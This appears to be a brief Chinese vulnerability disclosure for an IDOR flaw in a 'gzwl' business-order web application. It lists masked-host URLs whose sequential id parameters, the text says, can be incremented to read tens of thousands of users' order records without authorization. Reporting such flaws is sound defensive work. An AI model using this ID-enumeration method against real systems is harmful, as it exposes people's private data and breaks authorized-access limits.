漏洞在这
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderExecute.action?id=49733606
ID没有加密
替换即可查询上万用户
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderExecute.action?id=49733608
越权访问
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733605
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733610
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733611
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733612
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733613
依次+1逻辑,查询上万用户